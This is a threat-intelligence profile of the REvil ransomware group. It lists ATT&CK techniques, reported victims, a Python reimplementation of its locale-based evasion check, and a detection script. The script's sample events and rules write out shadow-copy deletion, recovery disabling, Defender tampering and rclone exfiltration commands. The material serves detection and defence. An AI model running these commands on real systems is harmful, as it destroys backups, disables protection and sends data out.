REvil
Group profile
The Sodinokibi ransomware group, also known as REvil (Ransomware Evil), operates under a ransomware-as-a-service (RaaS) model. After compromising a victim, the group threatens to publish the victim's sensitive data on its darknet leak site, the 'Happy Blog', unless the ransom is paid. The ransomware code used by REvil is closely similar to that used by DarkSide, a separate threat actor. In April 2021 REvil claimed to have stolen confidential schematics of upcoming Apple products in an attack on Quanta Computer, a supplier to the tech giant.
MITRE ATT&CK TTPs
Initial Access
T1078 Valid Accounts
Compromised RDP credentials, purchased from underground markets and initial access brokers, are used to establish a foothold.
T1190 Exploit Public-Facing Application
REvil has exploited Kaseya VSA (CVE-2021-30116), Pulse Secure VPN vulnerabilities, and an Oracle WebLogic deserialization flaw to gain initial access at scale.
T1195 Supply Chain Compromise
The Kaseya VSA supply chain attack (July 2021) abused a trusted IT management product to push REvil ransomware to managed service providers and thousands of their customers simultaneously.
Execution
Defense Evasion
T1027 Obfuscated Files or Information
REvil payloads are packed with custom packers, and the embedded configuration is RC4-encrypted to evade static detection.
T1497 Virtualization/Sandbox Evasion
REvil includes sandbox and geography checks: it inspects the system and user UI language and the installed keyboard layouts, and terminates without encrypting if a CIS-country locale is found.
T1562.001 Disable or Modify Tools
Security software is disabled via PowerShell, and Windows Defender exclusions are added through registry modifications before the payload is detonated.
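The locale gate described under T1497, reimplemented in Python as an added example (this is not REvil's code and is not taken from the page's source). The LANGID list is the one commonly reported in public analyses of the family and the endpoint inventory is constructed for illustration, so treat both as assumptions to verify against a real sample and real telemetry. The detail worth seeing is the keyboard-layout path: a Windows HKL such as 0xF0010419 carries its language in the low 16 bits, so a Russian layout added to an otherwise English host trips the gate even though both UI languages are English.

```python
"""REvil-style CIS locale/keyboard gate, reimplemented as an added example.

Not REvil's code. CIS_LANGIDS is the list commonly reported in public analyses
of the family (an assumption to check against your own sample); INVENTORY is
constructed sample data, not real endpoint telemetry.
"""

# Windows LANGIDs (low 16 bits of an LCID or keyboard HKL) reported in REvil's exclusion list.
CIS_LANGIDS = {
    0x0419,  # ru-RU
    0x0422,  # uk-UA
    0x0423,  # be-BY
    0x0428,  # tg-Cyrl-TJ
    0x042B,  # hy-AM
    0x042C,  # az-Latn-AZ
    0x0437,  # ka-GE
    0x043F,  # kk-KZ
    0x0440,  # ky-KG
    0x0442,  # tk-TM
    0x0443,  # uz-Latn-UZ
    0x0444,  # tt-RU
    0x0818,  # ro-MD
    0x0819,  # ru-MD
    0x082C,  # az-Cyrl-AZ
    0x0843,  # uz-Cyrl-UZ
    0x2801,  # ar-SY
}


def langid(value):
    """Reduce an LCID or keyboard HKL (e.g. 0x04190419 or 0xF0010419) to its LANGID.

    GetKeyboardLayoutList returns HKLs whose high word is a device/IME identifier;
    only the low word is the language, which is why masking is required.
    """
    return value & 0xFFFF


def would_abort(system_ui_lang, user_ui_lang, keyboard_layouts):
    """True when the gate fires, i.e. the payload would exit without encrypting.

    Mirrors the reported behaviour: the values of GetSystemDefaultUILanguage,
    GetUserDefaultUILanguage and every HKL from GetKeyboardLayoutList are each
    compared against the exclusion list; any single match is enough.
    """
    sources = [system_ui_lang, user_ui_lang, *keyboard_layouts]
    return any(langid(v) in CIS_LANGIDS for v in sources)


# Constructed endpoint inventory (not real data):
# (hostname, system UI LANGID, user UI LANGID, list of keyboard HKLs)
INVENTORY = [
    ("ws-nyc-01", 0x0409, 0x0409, [0x04090409]),                 # en-US only
    ("ws-kyiv-07", 0x0409, 0x0422, [0x04090409, 0x04220422]),    # user UI language uk-UA
    ("ws-lon-03", 0x0809, 0x0809, [0x08090809, 0xF0010419]),     # en-GB with a ru-RU layout added
]


def hosts_not_gated(inventory):
    """Hosts on which the gate would NOT fire, i.e. where the payload proceeds to encrypt."""
    return [host for host, sys_lang, usr_lang, hkls in inventory
            if not would_abort(sys_lang, usr_lang, hkls)]


if __name__ == "__main__":
    for host in hosts_not_gated(INVENTORY):
        print(f"{host}: no CIS locale present, payload would run")
```

Do not read this as a mitigation: adding a CIS keyboard layout only affects samples that still carry this check, and affiliates or later builds can drop it. The useful output is `hosts_not_gated`, which shows which part of an estate the gate would never have protected anyway.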
Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
Mimikatz is used to harvest credentials from LSASS memory for lateral movement and privilege escalation.
Discovery
Lateral Movement
T1021.001 Remote Services: Remote Desktop Protocol
RDP is used for lateral movement within victim networks with the harvested credentials.
Exfiltration
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Rclone is used to exfiltrate sensitive data to cloud storage before encryption, enabling double extortion via the Happy Blog leak site.
Command and Control
T1071.001 Application Layer Protocol: Web Protocols
HTTPS is used for C2 communication; Tor .onion addresses host the victim negotiation portal.
Impact
T1486 Data Encrypted for Impact
REvil encrypts files with Salsa20, using Elliptic Curve Diffie-Hellman (ECDH, Curve25519) to derive per-victim keys so that files cannot be recovered without the operators' private key. Files may be only partially encrypted for speed, and a per-victim random extension is appended. The operation runs as RaaS, with the operators reportedly retaining roughly 30-40% of each ransom and the affiliate keeping the remainder.
T1490 Inhibit System Recovery
Shadow copies are deleted via vssadmin, and the Windows recovery environment is disabled via bcdedit to prevent recovery.
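Detection logic for the three pre-encryption steps in this profile (T1562.001 Defender tampering, T1490 vssadmin/bcdedit recovery inhibition, T1567.002 rclone exfiltration), as an added example in Python; it is not from the page's source and not REvil's code. The process-creation events are constructed to resemble the fields of a Windows 4688 or Sysmon event 1 record, and the rule patterns and host-correlation threshold are my assumptions, chosen to be illustrative rather than exhaustive. The correlation step is the point: a lone `vssadmin list shadows` is admin noise, while shadow deletion plus a bcdedit recovery change on the same host, or an exclusion plus a Defender policy key, is the sequence this family runs right before detonation.

```python
"""Process-creation detections for REvil pre-encryption steps (added example).

Not REvil code and not from the original page. SAMPLE_EVENTS are constructed
records mimicking Windows 4688 / Sysmon EID 1 fields; RULES and the threshold
in hosts_with_chain() are illustrative assumptions, not a complete ruleset.
"""
import re

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "ws01", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled No"},
    {"host": "ws01", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -nop -c "Add-MpPreference -ExclusionPath C:\Users\Public"'},
    {"host": "ws02", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" '
                r'/v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"host": "fs01", "image": r"C:\Users\svc\AppData\Local\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance mega:backup --transfers 16"},
    {"host": "ws03", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},  # benign: listing, not deleting
]

# (ATT&CK technique, rule name, compiled pattern over the command line)
RULES = [
    ("T1490", "shadow copy deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("T1490", "recovery environment disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+.*?(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("T1562.001", "Defender exclusion added",
     re.compile(r"add-mppreference\s+-exclusion(path|process|extension)", re.I)),
    ("T1562.001", "Defender disabled via policy registry",
     re.compile(r"windows defender.*?disableantispyware", re.I)),
    ("T1567.002", "rclone copy to cloud remote",
     # source path, then a remote of the form <name>:<path>
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\s+\S+\s+\w+:", re.I)),
]


def scan(events):
    """Return one hit per (event, rule) match."""
    hits = []
    for ev in events:
        for technique, rule, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append({"host": ev["host"], "technique": technique,
                             "rule": rule, "cmdline": ev["cmdline"]})
    return hits


def hosts_with_chain(hits, min_rules=2):
    """Hosts where at least min_rules distinct rules fired.

    A single rule on a host is worth a look; two different ones in the same
    window is the pre-encryption chain and should page someone.
    """
    by_host = {}
    for h in hits:
        by_host.setdefault(h["host"], set()).add(h["rule"])
    return sorted(host for host, rules in by_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for h in found:
        print(f"{h['host']:5} {h['technique']:10} {h['rule']}: {h['cmdline']}")
    print("escalate:", hosts_with_chain(found))
```

In production the rules belong in the EDR or SIEM query language, and the rclone rule should be paired with the network side (large outbound transfers to consumer cloud storage from a file server), since a renamed binary defeats the command-line match.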
Recent victims
Showing 50 of 96 listed victims

| Date | Website / victim | Sector | Country |
|---|---|---|---|
| 2022-11-28 | kusd.edu | Education | US |
| 2022-11-28 | Sunknowledge Services Inc | Business Services | |
| 2022-11-07 | medibank.com.au | Healthcare | AU |
| 2022-09-01 | Midea Group | Manufacturing | |
| 2022-08-02 | Doosan Group | Manufacturing | |
| 2022-07-25 | OptiProERP is a leading global provider of industry-specific ERP solutions for manufacture | Technology | |
| 2022-05-12 | Ludwig Freytag Group | Manufacturing | |
| 2022-05-03 | Unicity International | Business Services | |
| 2022-04-22 | Stratford University | Education | |
| 2022-04-21 | Asfaltproductienijmegen | Construction | |
| 2022-04-21 | CYMZ | Not Found | |
| 2022-04-21 | www.oil-india.com | Energy | |
| 2022-04-20 | Visotec Group (www.visotec.com) | Manufacturing | |
| 2021-10-15 | PTT Exploration and Production - 720GB | Energy | |
| 2021-10-08 | ECKERD PERU S.A, INKAFARMA, MIFARMA | Healthcare | |
| 2021-10-07 | Join us on RAMP | Not Found | |
| 2021-10-01 | Ronmor Holdings | Business Services | |
| 2021-09-30 | Fimmick CRM Hong Kong (www.fimmick.com) | Technology | |
| 2021-09-16 | Spiezle Architectural Group Inc. | Construction | |
| 2021-09-11 | ohiograting.com | Manufacturing | |
| 2021-09-09 | Apex America | Not Found | |
| 2021-09-09 | Allen, Dyer, Doppelt, & Gilchrist, P.A. | Financial Services | |
| 2021-09-09 | Betenbough Homes | Construction | |
| 2021-09-09 | CEC Vibration Products | Manufacturing | |
| 2021-09-09 | ENPOL LLC | Manufacturing | |
| 2021-09-09 | Iaffaldano, Shaw & Young LLP | Business Services | |
| 2021-09-09 | Angstrom Automotive Group (angstrom-usa.com) | Manufacturing | US |
| 2021-09-09 | Agile Property Holdings | Not Found | |
| 2021-09-09 | Möbelstadt Sommerlad | Consumer Services | |
| 2021-09-09 | Gosiger | Business Services | |
| 2021-09-09 | neroindustry.com | Manufacturing | |
| 2021-09-09 | kuk.de / KREBS + KIEFER / 500GB | Manufacturing | |
| 2021-09-09 | KASEYA ATTACK INFO | Technology | |
| 2021-09-09 | Daylesford - BHoldings - Bamford - The Wild Rabbit | Hospitality and Tourism | |
| 2021-09-09 | Hx5, LLC | Not Found | |
| 2021-09-09 | inocean.no / 2000 GB | Not Found | |
| 2021-09-09 | Primo Water | Consumer Services | |
| 2021-09-09 | lstaff.com / atworksprofessional / atworks.com | Business Services | |
| 2021-09-09 | South Carolina Legal Services breach | Public Sector | |
| 2021-09-09 | ensingerplastics.com | Manufacturing | |
| 2021-07-02 | Kaseya clients | Technology | |
| 2021-06-28 | University Medical Center | Healthcare | US |
| 2021-06-01 | Fujifilm (fujifilm.com) | Healthcare | JP |
| 2021-05-30 | JBS (meat processor) | Agriculture and Food Production | |
| 2021-05-01 | Sol Oriens | Energy | US |
| 2021-04-28 | Brazil's Tribunal de Justiça do Estado do Rio Grande do Sul | Public Sector | BR |
| 2021-04-20 | Apple MacBook via supplier Quanta Computer | Technology | |
| 2021-04-01 | Asteelflash | Manufacturing | FR |
| 2021-03-31 | Pierre Fabre (pierre-fabre.com) | Manufacturing | FR |

